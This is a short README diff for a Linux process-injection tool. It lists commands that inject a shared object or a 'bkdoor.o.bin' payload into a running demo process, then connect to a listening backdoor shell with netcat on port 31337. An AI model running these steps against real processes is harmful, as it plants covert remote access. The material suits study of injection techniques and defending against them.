taojiang201/linux_injector/README.md

 # linux_injector
 # linux_injector
-make
+1.make

-In one terminal, run: ./saruman
+2.In one terminal, run: ./saruman

-In another terminal, run: ./lurker `pidof saruman` `pwd`/parasite_so.so Or
+3.In another terminal, run: ./lurker `pidof saruman` `pwd`/parasite_so.so Or 润：./lurker --b  `pidof saruman` bkdoor.o.bin

-./lurker --b  `pidof saruman` bkdoor.o.bin then,you can run: nc 127.0.0.1 31337
+4.then,you can run: nc 127.0.0.1 31337